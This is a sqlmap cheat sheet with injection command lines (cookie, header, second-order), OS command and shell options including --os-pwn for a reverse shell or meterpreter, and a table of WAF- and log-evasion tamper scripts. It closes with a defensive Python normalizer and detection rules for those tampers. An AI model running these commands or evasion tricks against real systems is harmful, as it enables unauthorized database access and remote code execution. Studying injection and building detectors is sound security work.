SQLMap - Cheatsheet

```bash
# Inside cookie
sqlmap -u "http://example.com" --cookie "mycookies=*"

# Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"

# PUT method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"

# The injection is located at the '*'
```
```bash
python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt --dbms MySQL --second-order "http:///joomla/administrator/index.php" -D "joomla" --dbs
```
```bash
# Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami

# Simple shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell

# Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
```
```bash
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
```

- `--batch` = non-interactive mode; sqlmap usually asks you questions, this accepts the default answers
- `--crawl` = how deep you want to crawl the site
- `--forms` = parse and test forms

Read this post about how to perform simple and complex second order injections with sqlmap.

```bash
# --not-string "string" tells sqlmap a string that does NOT appear in True responses
# (useful for finding boolean-based blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch
```

Remember that you can create your own tamper in Python and it's very simple. You can find a tamper example in the Second Order Injection page here.

| Tamper | Description |
| --- | --- |
| apostrophemask.py | Replaces apostrophe character with its UTF-8 full width counterpart |
| apostrophenullencode.py | Replaces apostrophe character with its illegal double unicode counterpart |
| appendnullbyte.py | Appends encoded NULL byte character at the end of payload |
| base64encode.py | Base64 all characters in a given payload |
| between.py | Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' |
| bluecoat.py | Replaces space character after SQL statement with a valid random blank character. Afterwards replaces character = with LIKE operator |
| chardoubleencode.py | Double url-encodes all characters in a given payload (not processing already encoded) |
| commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' |
| commalessmid.py | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' |
| concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' |
| charencode.py | Url-encodes all characters in a given payload (not processing already encoded) |
| charunicodeencode.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded). "%u0022" |
| charunicodeescape.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded). "\u0022" |
| equaltolike.py | Replaces all occurrences of operator equal ('=') with operator 'LIKE' |
| escapequotes.py | Slash escape quotes (' and ") |
| greatest.py | Replaces greater than operator ('>') with 'GREATEST' counterpart |
| halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword |
| ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' |
| modsecurityversioned.py | Embraces complete query with versioned comment |
| modsecurityzeroversioned.py | Embraces complete query with zero-versioned comment |
| multiplespaces.py | Adds multiple spaces around SQL keywords |
| nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters |
| percentage.py | Adds a percentage sign ('%') in front of each character |
| overlongutf8.py | Converts all characters in a given payload (not processing already encoded) |
| randomcase.py | Replaces each keyword character with random case value |
| randomcomments.py | Add random comments to SQL keywords |
| securesphere.py | Appends special crafted string |
| sp_password.py | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs |
| space2comment.py | Replaces space character (' ') with comments |
| space2dash.py | Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') |
| space2hash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') |
| space2morehash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') |
| space2mssqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
| space2mssqlhash.py | Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') |
| space2mysqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
| space2mysqldash.py | Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') |
| space2plus.py | Replaces space character (' ') with plus ('+') |
| space2randomblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
| symboliclogical.py | Replaces AND and OR logical operators with their symbolic counterparts (&& and \|\|) |
| unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT |
| unmagicquotes.py | Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) |
| uppercase.py | Replaces each keyword character with upper case value 'INSERT' |
| varnish.py | Appends an HTTP header 'X-originating-IP' |
| versionedkeywords.py | Encloses each non-function keyword with versioned MySQL comment |
| versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment |
| xforwardedfor.py | Appends a fake HTTP header 'X-Forwarded-For' |
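The tamper table above, and the note that tampers are simple Python transforms, are most useful to a defender as a list of what a signature must see through. The block below is an added example, not code from this page or from sqlmap: a detection-side normalizer that undoes the encodings and comment tricks the table describes (charencode, chardoubleencode, charunicodeencode/escape, space2plus, space2comment, versionedkeywords, space2dash/hash, the space2*blank family, randomcase, escapequotes) before a few simple rules are evaluated. The sample parameter values and the rule set are constructed for the example; a real WAF or log pipeline would carry a far larger rule set.

```python
import re
from urllib.parse import unquote

# Constructed sample parameter values: the same "1 UNION SELECT 1,2" probe written the
# way several tamper scripts from the table would emit it, plus one benign value.
SAMPLES = {
    "plain": "1 UNION SELECT 1,2",
    "space2comment": "1/**/UNION/**/SELECT/**/1,2",
    "randomcase+space2plus": "1+uNiOn+SeLeCt+1,2",
    "charencode": "1%20UNION%20SELECT%201%2C2",
    "chardoubleencode": "1%2520UNION%2520SELECT%25201%252C2",
    "charunicodeencode": "1%u0020UNION%u0020SELECT%u00201,2",
    "charunicodeescape": "1\\u0020UNION\\u0020SELECT\\u00201,2",
    "versionedkeywords": "1 /*!UNION*/ /*!SELECT*/ 1,2",
    "space2dash": "1--qwe\nUNION--rty\nSELECT--uio\n1,2",
    "space2mysqlblank": "1\x0bUNION\x0cSELECT\t1,2",
    "unionall": "1 UNION ALL SELECT 1,2",
    "benign": "42",
}

_UNICODE_ESC = re.compile(r"(?:%u|\\u)([0-9a-fA-F]{4})")   # %u0020 or \u0020
_VERSIONED = re.compile(r"/\*!\d*\s*(.*?)\*/", re.S)        # /*!50000 KEYWORD */
_COMMENT = re.compile(r"/\*.*?\*/", re.S)                   # /**/ and random comments
_LINE_COMMENT = re.compile(r"(?:--|#)[^\n]*\n")             # -- or # up to the newline
_BLANKS = re.compile(r"[\s\x0b\x0c\xa0]+")                  # alternate blank characters


def normalize(value: str, max_rounds: int = 3) -> str:
    """Undo the encodings and comment tricks from the tamper table so that a
    signature sees one canonical form of the parameter value."""
    s = value
    for _ in range(max_rounds):                        # chardoubleencode: decode until stable
        decoded = _UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), s)
        decoded = unquote(decoded)                     # charencode / chardoubleencode
        if decoded == s:
            break
        s = decoded
    s = s.replace("+", " ")                            # space2plus
    s = _VERSIONED.sub(r" \1 ", s)                     # versionedkeywords: keep the keyword itself
    s = _COMMENT.sub(" ", s)                           # space2comment, randomcomments
    s = _LINE_COMMENT.sub(" ", s)                      # space2dash, space2hash (+ random string)
    s = s.replace("\\'", "'").replace('\\"', '"')      # escapequotes
    s = _BLANKS.sub(" ", s).strip()                    # space2*blank, multiplespaces
    return s.upper()                                   # randomcase


# Constructed, deliberately small rule set applied to the canonical form.
RULES = {
    "union-select": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b"),
    "tautology": re.compile(r"\b(?:OR|AND)\s+'?(\w+)'?\s*=\s*'?\1'?"),
    "stacked-query": re.compile(r";\s*(?:DROP|INSERT|UPDATE|DELETE|EXEC)\b"),
}


def detect(value: str) -> list:
    """Return the names of the rules that fire on the normalized value."""
    canon = normalize(value)
    return [name for name, rx in RULES.items() if rx.search(canon)]


if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:24s} {normalize(raw)!r:28s} -> {detect(raw)}")
```

Running the block prints the canonical form of every sample next to the rules that fire on it; every obfuscated variant collapses to the same `1 UNION SELECT 1,2` and triggers `union-select`, while the benign value triggers nothing. Matching the raw values against the same rules would miss all but the `plain` and `unionall` samples, which is the practical lesson of the table: normalize first, then match.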
